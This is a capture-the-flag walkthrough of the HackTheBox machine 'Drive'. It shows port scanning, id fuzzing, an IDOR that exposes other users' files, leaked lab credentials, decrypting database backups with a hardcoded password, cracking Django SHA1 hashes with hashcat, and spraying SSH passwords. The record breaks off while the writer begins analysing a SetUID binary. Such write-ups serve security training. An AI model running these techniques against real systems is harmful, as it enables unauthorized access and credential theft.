oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.235
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-13 14:56 EST
Nmap scan report for 10.10.11.235
Host is up (0.093s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp filtered ppp
Nmap done: 1 IP address (1 host up) scanned in 7.19 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.235
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-13 14:56 EST
Nmap scan report for 10.10.11.235
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.97 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 20.04 focal. There’s a redirect on 80 to http://drive.htb
. Given the use of domain names, I’ll brute force for any subdomains that respond differently on the webserver, but not find any. I’ll add drive.htb
to my /etc/hosts
file.
The site is for a cloud storage service:
Only three links go off the page: “Contact Us”, “Register”, and “Login”. The rest of the links jump around on this page. There are some names and positions, as well as a couple @drive.htb
email addresses. There’s also a “Subscribe” box at the bottom. Entering an email and hitting submit sends a POST request to /subscribe/
, which returns a 302 Found. It’s not clear if these are processed or not.
The /contact/
page has a form:
Submitting sends a POST to /contact/
, and the response shows a message:
I’ll send some XSS payloads, but nothing ever connects back.
Registration goes to /register/
:
Login at /login/
looks similar:
Once I log in, there’s a /home/
page that shows files:
The only file there has a message from the admins:
In the “Files” menu, I can upload a file, and it lists the kinds of files that are accepted above the form:
I can upload a file, and then there are more options than “Just View”:
I can also mark a file as reserved in the “Files” menu. When I pick a file, it sends a POST to /blockFile/
:
POST /blockFile/ HTTP/1.1
Host: drive.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://drive.htb/blockFile/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://drive.htb
Connection: close
Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu
files%5B%5D=test&csrfmiddlewaretoken=TV5WYjQQiBYyYAZkMkW1sGSkywsHtNFUpHCtpyVZmOhjW5vhk5K92MuKK6n36yFp&action=post
Then I’m redirected to the dashboard, where it shows up with my handle in the “Reserve” column:
In the “My Files” section, there’s a way to do this with a GET request:
This sends a GET to /112/block/
, where 112 is the ID for the file (viewing the file is at /112/getFileDetail/
).
There are also Groups. I can create a group and add users to it, comma separated. I’ll try adding users that don’t exist:
When viewing the group, I’ll see that “admin” is added, but the two nonsense ones are not:
This is a way to enumerate users.
The “Reports” section shows my activity:
The HTTP response headers show only nginx:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 13 Feb 2024 20:05:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Frame-Options: DENY
Vary: Cookie
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
Set-Cookie: csrftoken=FMAJgqV5IHLMXN9PKh36bMxTZZryFxBZ; expires=Tue, 11 Feb 2025 20:05:17 GMT; Max-Age=31449600; Path=/; SameSite=Lax
Content-Length: 14647
csrftoken
is the default name for this protection in Django (the Python web framework), so that could be a sign. The 404 page also matches this reference for the Django 404:
I’ll start feroxbuster
on the site, but after a minute it starts returning 500s.
There’s nothing super interesting in here that I don’t find by browsing the site.
The URL for a group is /[id]/getGroupDetail/
. Similarly, the URL for a file is /[id]/getFileDetail/
. I’ll test to see how other ids respond. For example, groups:
oxdf@hacky$ ffuf -u http://drive.htb/FUZZ/getGroupDetail/ -w <(seq 1 500) -fc 500 -H "Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://drive.htb/FUZZ/getGroupDetail/
:: Wordlist : FUZZ: /dev/fd/63
:: Header : Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
28 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 364ms]
39 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 374ms]
40 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 401ms]
42 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 302ms]
47 [Status: 200, Size: 5407, Words: 1244, Lines: 193, Duration: 300ms]
49 [Status: 200, Size: 5407, Words: 1244, Lines: 193, Duration: 293ms]
48 [Status: 200, Size: 5406, Words: 1244, Lines: 193, Duration: 299ms]
:: Progress: [500/500] :: Job [1/1] :: 142 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
Here, I have ffuf
hit http://drive.htb/FUZZ/getGroupDetail/
to check for all group numbers. For the wordlist, I’ll use -w <(seq 1 500)
, which uses process substitution to pretend there’s a file containing the numbers 1 through 500 one per line. -fc 500
will hide results that return HTTP 500, which is what happens when there’s a non-existent id. I’ll also need to include my cookie, which I can grab from Burp.
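The same sweep is simple to script directly; here’s a minimal sketch of the logic (the fetch callable stands in for an authenticated HTTP GET, and the canned responses below are illustrative values, not real server data):

```python
# Sketch of the sweep ffuf is doing: request each id and keep anything
# that isn't the 500 returned for non-existent objects. fetch() stands
# in for an authenticated HTTP GET that returns a status code.
def sweep_ids(base_url, endpoint, ids, fetch):
    hits = {}
    for i in ids:
        status = fetch(f"{base_url}/{i}/{endpoint}/")
        if status != 500:  # 200 = accessible, 401 = exists but unauthorized
            hits[i] = status
    return hits

# Demo with canned responses (illustrative, not the box's real data)
canned = {28: 401, 47: 200, 48: 200}
hits = sweep_ids("http://drive.htb", "getGroupDetail", range(1, 501),
                 lambda url: canned.get(int(url.split("/")[3]), 500))
print(hits)   # {28: 401, 47: 200, 48: 200}
```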
I’ll note that the last three are groups I created (47-49) and return 200. The others, 28, 39, 40, and 42, return 401. Trying to visit these returns a 401 Unauthorized:
HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 13 Feb 2024 21:11:32 GMT
Content-Type: application/json
Content-Length: 26
Connection: close
X-Frame-Options: DENY
Vary: Cookie
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
{"status": "unauthorized"}
I can do the same attack on files:
oxdf@hacky$ ffuf -u http://drive.htb/FUZZ/getFileDetail/ -w <(seq 1 500) -fc 500 -H "Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://drive.htb/FUZZ/getFileDetail/
:: Wordlist : FUZZ: /dev/fd/63
:: Header : Cookie: csrftoken=GWHHBpfjentV8FG7IVYiKgMAmK5wNVaF; sessionid=c8xebin9cekvgy59r1de8wvfmllxgrnu
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 500
________________________________________________
79 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 336ms]
99 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 335ms]
98 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 347ms]
101 [Status: 401, Size: 26, Words: 2, Lines: 1, Duration: 327ms]
100 [Status: 200, Size: 5078, Words: 1147, Lines: 172, Duration: 357ms]
112 [Status: 200, Size: 5053, Words: 1062, Lines: 167, Duration: 334ms]
:: Progress: [500/500] :: Job [1/1] :: 149 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
There are two files I can access. 112 is the test file I uploaded, and 100 is the “Welcome_to_Doodle_Grive!” file owned by admin. There are four other files that I can’t access - 79, 98, 99, and 101.
It’s worth noting that while I would expect an API endpoint like /[id]/block/
to set the reserved attribute to my user id, that actually returns a page:
The /[id]/block/
page will show files that I otherwise can’t access:
This is an insecure direct object reference (IDOR) vulnerability.
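The bug class boils down to one endpoint fetching an object by its id without checking ownership while another endpoint does check. A toy illustration of the pattern (all names and data here are made up, not the actual DoodleGrive code):

```python
# Toy model of the IDOR: two "views" over the same data, where only
# one enforces ownership. All names and data are illustrative.
FILES = {
    100: {"owner": "admin", "name": "Welcome_to_Doodle_Grive!"},
    112: {"owner": "0xdf", "name": "test"},
}

def get_file_detail(user, file_id):
    """Models /[id]/getFileDetail/ -- enforces ownership."""
    f = FILES[file_id]
    if f["owner"] != user:
        raise PermissionError("unauthorized")
    return f

def block(user, file_id):
    """Models /[id]/block/ -- fetches by id with no ownership check."""
    return FILES[file_id]
```

Calling get_file_detail("0xdf", 100) raises PermissionError, while block("0xdf", 100) happily returns the admin-owned file, which is exactly the behavior observed above.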
The four files each contain some clues about the rest of the box. 101 (above) references a scheduled backup of the DB to /var/www/backups
(a location that may change), protected by a strong password.
ID 98 references an edit functionality:
99 says that the dev team needs to stop using the platform for chat, and references security issues:
Most importantly, 79 has a username and password:
That username and password work for SSH access to Drive:
oxdf@hacky$ sshpass -p 'Xk4@KjyrYv8t194L!' ssh martin@drive.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)
...[snip]...
martin@drive:~$
martin’s home directory is basically empty:
martin@drive:~$ ls -la
total 32
drwxr-x--- 5 martin martin 4096 Sep 11 09:24 .
drwxr-xr-x 6 root root 4096 Dec 25 2022 ..
lrwxrwxrwx 1 root root 9 Sep 6 02:56 .bash_history -> /dev/null
-rw-r--r-- 1 martin martin 220 Dec 25 2022 .bash_logout
-rw-r--r-- 1 martin martin 3771 Dec 25 2022 .bashrc
drwx------ 2 martin martin 4096 Dec 25 2022 .cache
drwx------ 3 martin martin 4096 Jan 7 2023 .gnupg
-rw-r--r-- 1 martin martin 807 Dec 25 2022 .profile
drwx------ 3 martin martin 4096 Jan 7 2023 snap
There are three other directories in /home
:
martin@drive:/home$ ls
cris git martin tom
martin is not able to access any of them.
There are two scripts in /opt
:
martin@drive:/opt$ ls -l
total 8
-r-x------ 1 www-data www-data 187 Feb 11 2023 nginx-log-size-handler.sh
-r-x------ 1 www-data www-data 3834 Feb 8 2023 server-health-check.sh
Interestingly, they are only accessible to the www-data user.
In /var/www
, there are three directories:
martin@drive:/opt$ ls -l /var/www/
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 1 18:23 backups
drwxrwx--- 8 www-data www-data 4096 Feb 14 14:34 DoodleGrive
drwxr-xr-x 2 root root 4096 Jan 7 2023 html
Only www-data can access DoodleGrive
, and html
is just the default nginx page:
martin@drive:/var/www$ cd DoodleGrive/
-bash: cd: DoodleGrive/: Permission denied
martin@drive:/var/www$ ls html/
index.nginx-debian.html
backups
is what was mentioned in the file:
martin@drive:/var/www/backups$ ls
1_Dec_db_backup.sqlite3.7z 1_Oct_db_backup.sqlite3.7z db.sqlite3
1_Nov_db_backup.sqlite3.7z 1_Sep_db_backup.sqlite3.7z
I am able to list the contents of each backup:
martin@drive:/var/www/backups$ 7z l 1_Dec_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:21:51 ....A 3760128 12848 DoodleGrive/db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:21:51 3760128 12848 1 files
martin@drive:/var/www/backups$ 7z l 1_Nov_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-09-01 18:25:59 ....A 3760128 12080 db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2023-09-01 18:25:59 3760128 12080 1 files
martin@drive:/var/www/backups$ 7z l 1_Oct_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:02:42 ....A 3760128 12576 db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:02:42 3760128 12576 1 files
martin@drive:/var/www/backups$ 7z l 1_Sep_db_backup.sqlite3.7z
...[snip]...
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:03:57 ....A 3760128 12624 db.sqlite3
------------------- ----- ------------ ------------ ------------------------
2022-12-26 06:03:57 3760128 12624 1 files
Each archive contains a db.sqlite3
file. The timestamps for the archives and the databases inside them are very confusing. I’m going to chalk that up to poor work on the author / HTB’s part and try not to read too much into it.
Trying to unpack any of the archives prompts for a password:
martin@drive:/var/www/backups$ 7z x 1_Dec_db_backup.sqlite3.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7302P 16-Core Processor (830F10),ASM,AES-NI)
Scanning the drive for archives:
1 file, 13018 bytes (13 KiB)
Extracting archive: 1_Dec_db_backup.sqlite3.7z
--
Path = 1_Dec_db_backup.sqlite3.7z
Type = 7z
Physical Size = 13018
Headers Size = 170
Method = LZMA2:22 7zAES
Solid = -
Blocks = 1
Enter password (will not be echoed):
No password I have so far works. I could try to exfil them and crack the password, but first I’ll look at db.sqlite3
, which I can access:
martin@drive:/var/www/backups$ sqlite3 db.sqlite3
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite>
There’s nothing too interesting in here. The accounts_customuser
table has hashes, and I can quickly crack tomHands’ password of “john316”, but I don’t yet have a use for it.
nmap
identified that port 3000 was handling requests differently, showing it as filtered. It shows up in the netstat
as well:
martin@drive:~$ netstat -tnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::3000 :::* LISTEN -
curl
shows that this is a Gitea instance:
martin@drive:~$ curl -s localhost:3000 | head
<!DOCTYPE html>
<html lang="en-US" class="theme-">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title> Gitea: Git with a cup of tea</title>
<link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9sb2NhbGhvc3Q6MzAwMC9hc3NldHMvaW1nL2xvZ28uc3ZnIiwidHlwZSI6ImltYWdlL3N2Zyt4bWwiLCJzaXplcyI6IjUxMng1MTIifV19">
<meta name="theme-color" content="#6cc644">
<meta name="default-theme" content="auto">
<meta name="author" content="Gitea - Git with a cup of tea">
To get better access, I’ll use SSH to create a tunnel from port 3000 on my box to port 3000 on Drive with -L 3000:localhost:3000
. Now in Firefox:
On the “Explore” link, there are a couple of users visible to unauthenticated users:
I am able to register myself an account, but it doesn’t give access to anything additional.
One of the users is martinCruz, and I have a password for a martin user already. I’ll try it here, and it works! martin has access to one repository that was not visible before:
This repo is for the website:
I’ll note a couple things:
db_backup.sh
was added in a commit titled “added the new database backup feature”, which was on 22 December 2022. The script itself has the password for the archives:
#!/bin/bash
DB=$1
date_str=$(date +'%d_%b')
7z a -p'H@ckThisP@ssW0rDIfY0uC@n:)' /var/www/backups/${date_str}_db_backup.sqlite3.7z db.sqlite3
cd /var/www/backups/
ls -l --sort=t *.7z > backups_num.tmp
backups_num=$(cat backups_num.tmp | wc -l)
if [[ $backups_num -gt 10 ]]; then
#backups is more than 10... deleting to oldest backup
rm $(ls *.7z --sort=t --color=never | tail -1)
#oldest backup deleted successfully!
fi
rm backups_num.tmp
The geeks_site
folder has a last comment message referencing going back to “default Django hashes due to problems in BCrypt”, dated 26 December 2022. That specifically applies to a settings.py
file. The history of the file shows it changed from SHA1 to Bcrypt and back to SHA1:
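In Django, which hasher is used is controlled by the PASSWORD_HASHERS setting: the first entry stores new passwords, and the remaining entries can still verify old hashes. A hypothetical settings.py fragment consistent with that history (a sketch, not the actual repo file):

```python
# Hypothetical settings.py fragment (illustrative, not the repo's file).
# The first hasher listed is used to store passwords; the others remain
# valid for checking existing hashes.
PASSWORD_HASHERS = [
    "django.contrib.auth.hashers.SHA1PasswordHasher",           # rolled back to this
    # "django.contrib.auth.hashers.BCryptSHA256PasswordHasher", # briefly tried
    "django.contrib.auth.hashers.PBKDF2PasswordHasher",         # Django's default
]
```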
With the password, I’ll revisit the backup archives. I can extract each to /dev/shm
with the following command:
martin@drive:/var/www/backups$ 7z e -o/dev/shm 1_Oct_db_backup.sqlite3.7z -p'H@ckThisP@ssW0rDIfY0uC@n:)'
...[snip]...
martin@drive:/var/www/backups$ mv /dev/shm/db.sqlite3 /dev/shm/oct.sqlite3
After doing all four, I have:
martin@drive:/dev/shm$ ls
dec.sqlite3 nov.sqlite3 oct.sqlite3 sep.sqlite3
Each of the backups is basically the same as the others and the db.sqlite3
that I could access above. I’ll show the general structure here, and call out the differences later.
The database looks like a Django DB based on the table names:
sqlite> .tables
accounts_customuser auth_permission
accounts_customuser_groups django_admin_log
accounts_customuser_user_permissions django_content_type
accounts_g django_migrations
accounts_g_users django_session
auth_group myApp_file
auth_group_permissions myApp_file_groups
A bunch of the tables are empty. myApp_file
has the content from the files I was able to read with the IDOR:
sqlite> select * from myApp_file;
98|documents/crisDisel/Hi|b'hi team\nhave a great day.\nwe are testing the new edit functionality!\nit seems to work great!\n'|2022-12-24 16:52:22.971837|24||Hi!
99|documents/jamesMason/security_announce|b'hi team\nplease we have to stop using the document platform for the chat\n+I have fixed the security issues in the middleware\nthanks! :)\n'|2022-12-24 16:55:56.501240|21||security_announce
101|documents/jamesMason/database_backup_plan|hi team!
me and my friend(Cris) created a new backup scheduled plan for the database
the database will be automatically highly compressed and copied to /var/www/backups/ by a small bash script every day at 12:00 AM
*Note: the backup directory may change in the future!
*Note2: the backup would be protected with strong password! don't even think to crack it guys! :)|2022-12-24 22:49:49.515472|21|21|database_backup_plan!
Most interesting is the accounts_customuser
table, which has hashes for users that match up nicely with some local accounts on Drive:
sqlite> select * from accounts_customuser;
21|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a|2022-12-26 05:48:27.497873|0|jamesMason|||jamesMason@drive.htb|0|1|2022-12-23 12:33:04
22|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f|2022-12-24 12:55:10|0|martinCruz|||martin@drive.htb|0|1|2022-12-23 12:35:02
23|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004|2022-12-24 13:17:45|0|tomHands|||tom@drive.htb|0|1|2022-12-23 12:37:45
24|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f|2022-12-24 16:51:53|0|crisDisel|||cris@drive.htb|0|1|2022-12-23 12:39:15
30|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3|2022-12-26 05:43:40.388717|1|admin|||admin@drive.htb|1|1|2022-12-26 05:30:58.003372
There are tables with group names and how they tie to files, but nothing too interesting.
One place that I see differences is the myApp_file
table, as the older backups don’t have as many messages. Still, there’s nothing I haven’t seen before.
Another place to look for differences is in the accounts_customuser
table. I’ll loop over each and dump the hashes:
martin@drive:/dev/shm$ ls | while read db; do echo "$db"; sqlite3 "$db" 'select username,password from accounts_customuser;'; done
db.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
dec.sqlite3
admin|pbkdf2_sha256$390000$ZjZj164ssfwWg7UcR8q4kZ$KKbWkEQCpLzYd82QUBq65aA9j3+IkHI6KK9Ue8nZeFU=
jamesMason|pbkdf2_sha256$390000$npEvp7CFtZzEEVp9lqDJOO$So15//tmwvM9lEtQshaDv+mFMESNQKIKJ8vj/dP4WIo=
martinCruz|pbkdf2_sha256$390000$GRpDkOskh4irD53lwQmfAY$klDWUZ9G6k4KK4VJUdXqlHrSaWlRLOqxEvipIpI5NDM=
tomHands|pbkdf2_sha256$390000$wWT8yUbQnRlMVJwMAVHJjW$B98WdQOfutEZ8lHUcGeo3nR326QCQjwZ9lKhfk9gtro=
crisDisel|pbkdf2_sha256$390000$TBrOKpDIumk7FP0m0FosWa$t2wHR09YbXbB0pKzIVIn9Y3jlI3pzH0/jjXK0RDcP6U=
nov.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
oct.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
sep.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
The PBKDF2 hashes (start with pbkdf2_sha256
) are going to be very difficult to crack. I’ll start with the others. There are eight unique hashes, four of which belong to tom:
martin@drive:/dev/shm$ ls | while read db; do echo "$db"; sqlite3 "$db" 'select username,password from accounts_customuser;'; done | grep sha1 | sort -u | tr '|' ':'
admin:sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
crisDisel:sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
jamesMason:sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz:sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands:sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93
tomHands:sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004
tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a
tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141
I’ll take the usernames and hashes from the backup DB and send them through hashcat
:
$ hashcat hashes --user /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
124 | Django (SHA-1) | Framework
...[snip]...
sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004:john316
sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93:john boy
sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141:johniscool
sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a:johnmayer7
...[snip]...
All four passwords for tomHands crack.
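hashcat’s mode 124 is just SHA1 over the salt concatenated with the password, stored as sha1$salt$digest, which makes a cracked candidate easy to verify offline. A minimal sketch (the demo builds its own hash with a made-up salt rather than relying on the box’s values):

```python
import hashlib

def check_django_sha1(stored, candidate):
    """Verify a candidate password against a Django sha1$salt$digest hash."""
    algo, salt, digest = stored.split("$")
    assert algo == "sha1"
    return hashlib.sha1((salt + candidate).encode()).hexdigest() == digest

# Self-contained demo: build a hash the same way, then verify it.
demo = "sha1$somesalt$" + hashlib.sha1(b"somesaltjohn316").hexdigest()
print(check_django_sha1(demo, "john316"))   # True
print(check_django_sha1(demo, "wrong"))     # False
```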
To quickly check if any of these work over SSH, I’ll create a text file with one password per line, and feed it to netexec
:
oxdf@hacky$ netexec ssh drive.htb -u tom -p tom_passwords
SSH 10.10.11.235 22 drive.htb [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
SSH 10.10.11.235 22 drive.htb [-] tom:john316 Authentication failed.
SSH 10.10.11.235 22 drive.htb [-] tom:john boy Authentication failed.
SSH 10.10.11.235 22 drive.htb [-] tom:johniscool Authentication failed.
SSH 10.10.11.235 22 drive.htb [+] tom:johnmayer7 - shell access!
It works!
I’ll connect over SSH:
oxdf@hacky$ sshpass -p 'johnmayer7' ssh tom@drive.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)
...[snip]...
tom@drive:~$
su
also works from the shell as martin:
martin@drive:/dev/shm$ su - tom
Password:
tom@drive:~$
Either way, I can grab user.txt
:
tom@drive:~$ cat user.txt
20b6a381************************
In the tom user’s home directory, there’s a doodleGrive-cli
file that’s owned by root and set as SetUID:
tom@drive:~$ ls -l
total 876
-rwSr-x--- 1 root tom 887240 Sep 13 13:36 doodleGrive-cli
-rw-r----- 1 root tom 719 Feb 11 2023 README.txt
-rw-r----- 1 root tom 33 Feb 12 21:26 user.txt
The README.txt
says:
Hi team
after the great success of DoodleGrive, we are planning now to start working on our new project: "DoodleGrive self hosted",it will allow our customers to deploy their own documents sharing platform privately on their servers...
However in addition with the "new self Hosted release" there should be a tool(doodleGrive-cli) to help the IT team in monitoring server status and fix errors that may happen.
As we mentioned in the last meeting the tool still in the development phase and we should test it properly...
We sent the username and the password in the email for every user to help us in testing the tool and make it better.
If you face any problem, please report it to the development team.
Best regards.
Running it prompts for a username and password:
tom@drive:~$ ./doodleGrive-cli
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
0xdf
Enter password for 0xdf:
0xdf
Invalid username or password.
I’ll pull the binary to my host with scp
:
oxdf@hacky$ sshpass -p 'johnmayer7' scp tom@drive.htb:~/doodleGrive-cli .
The file is a 64-bit Linux executable:
oxdf@hacky$ file doodleGrive-cli
